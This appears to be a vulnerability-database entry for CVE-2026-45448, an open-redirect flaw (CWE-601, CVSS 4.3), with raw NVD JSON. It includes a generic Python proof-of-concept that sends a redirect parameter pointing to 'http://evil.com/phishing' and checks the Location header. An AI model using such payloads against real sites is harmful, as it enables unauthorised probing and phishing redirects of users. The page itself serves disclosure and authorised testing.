Security Vulnerability Report
中文
CVE-2026-45448 CVSS 4.3 MEDIUM

CVE-2026-45448

Published: 2026-05-14 17:16:24
Last Modified: 2026-05-14 18:24:09

Description

CWE-601 URL redirection to untrusted site ('open redirect')

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

未知

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests target_url = "http://example.com/redirect" malicious_payload = "http://evil.com/phishing" # Sending a GET request with the malicious redirect parameter params = { "url": malicious_payload # Common parameter name, might vary } response = requests.get(target_url, params=params, allow_redirects=False) # Check if the server responds with a 302/301 Redirect if response.status_code in [301, 302, 303, 307, 308]: if "evil.com" in response.headers.get('Location', ''): print(f"[+] Vulnerability Confirmed! Redirecting to: {response.headers['Location']}") else: print("[-] Redirect occurred, but not to the malicious payload.") else: print("[-] No redirect detected.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45448", "sourceIdentifier": "[email protected]", "published": "2026-05-14T17:16:23.640", "lastModified": "2026-05-14T18:24:08.747", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "CWE-601 URL redirection to untrusted site ('open redirect')"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0", "source": "[email protected]"}]}}